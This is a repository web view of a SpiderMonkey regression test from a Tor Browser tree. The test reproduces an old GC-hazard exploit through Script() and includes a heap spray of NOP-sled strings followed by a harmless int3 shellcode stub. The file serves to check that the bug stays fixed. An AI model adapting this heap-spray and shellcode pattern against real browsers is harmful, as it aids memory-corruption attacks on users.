The Tor Browser / file revision

js/src/tests/js1_5/extensions/regress-338804-02.js@129ffea94266

js/src/tests/js1_5/extensions/regress-338804-02.js

Sat, 03 Jan 2015 20:18:00 +0100

author
Michael Schloh von Bennewitz <michael@schloh.com>
date
Sat, 03 Jan 2015 20:18:00 +0100
branch
TOR_BUG_3246
changeset 7
129ffea94266
permissions
-rw-r--r--

Conditionally enable double key logic according to:
private browsing mode or privacy.thirdparty.isolate preference and
implement in GetCookieStringCommon and FindCookie where it counts...
With some reservations of how to convince FindCookie users to test
condition and pass a nullptr when disabling double key logic.

     1 /* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */

     2 /* This Source Code Form is subject to the terms of the Mozilla Public

     3  * License, v. 2.0. If a copy of the MPL was not distributed with this

     4  * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

     5 

     6 //-----------------------------------------------------------------------------

     7 var BUGNUMBER = 338804;

     8 var summary = 'GC hazards in constructor functions';

     9 var actual = 'No Crash';

    10 var expect = 'No Crash';

    11 

    12 printBugNumber(BUGNUMBER);

    13 printStatus (summary);

    14 printStatus ('Uses Intel Assembly');

    15 

    16 // <script>

    17 // SpiderMonkey Script() GC hazard exploit

    18 //

    19 // scale: magic number ;-)

    20 //  BonEcho/2.0a2: 3000

    21 //  Firefox/1.5.0.4: 2000

    22 //

    23 var rooter, scale = 2000;

    24 

    25 exploit();

    26 /*

    27   if(typeof(setTimeout) != "undefined") {

    28   setTimeout(exploit, 2000);

    29   } else {

    30   exploit();

    31   }

    32 */

    33 

    34 function exploit() {

    35   if (typeof Script == 'undefined')

    36   {

    37     print('Test skipped. Script not defined.');

    38   }

    39   else

    40   {

    41     Script({ toString: fillHeap });

    42     Script({ toString: fillHeap });

    43   }

    44 }

    45 

    46 function createPayload() {

    47   var result = "\u9090", i;

    48   for(i = 0; i < 9; i++) {

    49     result += result;

    50   }

    51   /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */

    52   result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";

    53   return result;

    54 }

    55 

    56 function fillHeap() {

    57   rooter = [];

    58   var payload = createPayload(), block = "", s2 = scale * 2, i;

    59   for(i = 0; i < scale; i++) {

    60     rooter[i] = block = block + payload;

    61   }

    62   for(; i < s2; i++) {

    63     rooter[i] = payload + i;

    64   }

    65   return "";

    66 }

    67 

    68 // </script>

    69  

    70 reportCompare(expect, actual, summary);

Mercurial Repository: The Tor Browser

Europalab SCM Repository Server

mercurial